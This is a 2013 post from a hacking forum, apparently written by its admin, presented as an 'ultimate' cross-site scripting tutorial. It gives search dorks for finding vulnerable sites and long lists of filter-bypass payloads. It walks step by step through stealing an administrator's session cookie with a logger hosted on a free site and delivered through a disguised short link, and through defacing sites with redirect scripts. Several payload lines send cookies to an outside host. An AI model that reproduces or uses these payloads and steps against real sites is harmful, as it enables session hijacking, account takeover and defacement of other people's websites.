Ethical Experts
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  FAQFAQ  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Tue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Fri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Thu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Sat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Sat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Sat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Wed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Fri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Fri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
Hacking With Keyloggers Prorat
How to Get Unlimited time in an Internet Cafe ... :D
Cracking a WPA/WPA-2 Password.. ;)
How to Hack Websites & Servers - Tutorial
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
netcat
Facebook Like
Similar topics

Share | 
 

 XSS (Cross Site Scripting) :---- ULTMATE TUTORIAL ----:

View previous topic View next topic Go down 
AuthorMessage
The Joker
Admin
Admin
avatar

Posts : 182
Join date : 2012-06-11
Age : 26

PostSubject: XSS (Cross Site Scripting) :---- ULTMATE TUTORIAL ----:   Sun Apr 21, 2013 7:34 pm

XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.


What is HTML and Javascript?



HTML

HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.

Javascript

Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.


XSS: Attacking


Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS. Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source as well. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar. So, lets try putting in the most known, BASIC query of all time.


<script>alert("XSS")</script>


That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:

<script>alert( > XSS DETECTED < )</script>


It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message . We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this:

<script>alert(String.fromCharCode(88,83,83))</script>


below are some codes You can try


Code:
"><script>alert("XSS")</script>
 
"><script>alert(String.fromCharCode(88,83,83))</script>
 
'><script>alert("XSS")</script>
 
'><script>alert(String.fromCharCode(88,83,83))</script>
 
<ScRIPt>aLeRT("XSS")</ScRIPt>
 
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
 
"><ScRIPt>aLeRT("XSS")</ScRIPt>
 
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
 
'><ScRIPt>aLeRT("XSS")</ScRIPt>
 
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
 
</script><script>alert("XSS")</script>
 
</script><script>alert(String.fromCharCode(88,83,83))</script>
 
"/><script>alert("XSS")</script>
 
"/><script>alert(String.fromCharCode(88,83,83))</script>
 
'/><script>alert("XSS")</script>
 
'/><script>alert(String.fromCharCode(88,83,83))</script>
 
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
 
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
 
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
 
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 
";alert("XSS");"
 
";alert(String.fromCharCode(88,83,83));"
 
';alert("XSS");'
 
';alert(String.fromCharCode(88,83,83));'
 
";alert("XSS")
 
";alert(String.fromCharCode(88,83,83))
 
';alert("XSS")
 
';alert(String.fromCharCode(88,83,83))
 



Cookie Stealing/Logging

Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.

First, you should setup a site. Personally, I use http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there.

Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add This code into in, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)).

Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin . To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.



To Tiny the URL, go to http://www.tinyurl.com/ and just put in the URL. But hold on, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.



Code:
 <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>


So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it.



Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it.


Defacing

Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)

<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>


Some XSS Dorks

It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:


inurl:search.php?

inurl:find.php?

inurl:search.html

inurl:find.html

inurl:search.aspx

inurl:find.aspx




XSS Dorks and Cheats COLLECTED BY BBHH

XSS Dorks

Code:

 
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

XSS Cheats

Code:


'';!--"<XSS>=&{()}
 
'>//\\,<'>">">"*"
 
'); alert('XSS
 
<script>alert(1);</script>
 
<script>alert('XSS');</script>
 
<IMG SRC="javascript:alert('XSS');">
 
<IMG SRC=javascript:alert('XSS')>
 
<IMG SRC=JaVaScRiPt:alert('XSS')>
 
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
 
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie"+escape(document.cookie)</script>
 
<scr<script>ipt>alert('XSS');</scr</script>ipt>
 
<script>alert(String.fromCharCode(88,83,83))</script>
 
<img src=foo.png onerror=alert(/xssed/) />
 
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
 
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
 
<marquee><script>alert('XSS')</script></marquee>
 
<IMG SRC=\"jav   ascript:alert('XSS');\">
 
<IMG SRC=\"jav
ascript:alert('XSS');\">
 
<IMG SRC=\"jav
ascript:alert('XSS');\">
 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 
"><script>alert(0)</script>
 
<script src=http://yoursite.com/your_files.js></script>
 
</title><script>alert(/xss/)</script>
 
</textarea><script>alert(/xss/)</script>
 
<IMG LOWSRC=\"javascript:alert('XSS')\">
 
<IMG DYNSRC=\"javascript:alert('XSS')\">
 
<font style='color:expression(alert(document.cookie))'>
 
<img src="javascript:alert('XSS')">
 
<script language="JavaScript">alert('XSS')</script>
 
<body onunload="javascript:alert('XSS');">
 
<body onLoad="alert('XSS');"
 
[color=red' onmouseover="alert('xss')"]mouse over[/color]
 
"/></a></><img src=1.gif onerror=alert(1)>
 
window.alert("Bonjour !");
 
<div style="x:expression((window.r==1)?'':eval('r=1;
 
alert(String.fromCharCode(88,83,83));'))">
 
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
 
"><script alert(String.fromCharCode(88,83,83))</script>
 
'>><marquee><h1>XSS</h1></marquee>
 
'">><script>alert('XSS')</script>
 
'">><marquee><h1>XSS</h1></marquee>
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
 
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
 
<script>var var = 1; alert(var)</script>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
 
<IMG SRC='vbscript:msgbox(\"XSS\")'>
 
" onfocus=alert(document.domain) "> <"
 
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
 
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
 
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
 
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
 
<br size=\"&{alert('XSS')}\">
 
<scrscriptipt>alert(1)</scrscriptipt>
 
</br style=a:expression(alert())>
 
</script><script>alert(1)</script>
 
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
 
[color=red width=expression(alert(123))][color]
 
<BASE HREF="javascript:alert('XSS');//">
 
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
 
"></iframe><script>alert(123)</script>
 
<body onLoad="while(true) alert('XSS');">
 
'"></title><script>alert(1111)</script>
 
</textarea>'"><script>alert(document.cookie)</script>
 
'""><script language="JavaScript"> alert('X \nS \nS');</script>
 
</script></script><<<<script><>>>><<<script>alert(123)</script>
 
<html><noalert><noscript>(123)</noscript><script>(123)</script>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
'></select><script>alert(123)</script>
 
'>"><script src = 'http://www.site.com/XSS.js'></script>
 
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
 
<SCRIPT>document.write("XSS");</SCRIPT>
 
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
 
='><script>alert("xss")</script>
 
<script+src=">"+src="http://yoursite.com/xss.js?69%2C69"></script>
 
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
 
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
 
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
 
src="http://www.site.com/XSS.js"></script>
 
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
 
!--" /><script>alert('xss');</script>
 
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
 
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
 
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
 
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
 
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
 
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
 
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
 
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>


___________________________________________________
Do NOT PM me until you are DONATING or Your Upgrade  hasn't been completed even after you have purchased it .
If is one of the above, you can either choose to PM or mail me ..
Back to top Go down
View user profile http://teamiha.tumblr.com
 
XSS (Cross Site Scripting) :---- ULTMATE TUTORIAL ----:
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Sample UI Element file for google site.
» How do you recruit the fairy in Chrono Cross?
» cross browser testing
» Jual Arwana Cross Back Malaysia 20 cm , Welcome Reseller...!!
» Ultimate FEXP Scripting Tutorial

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: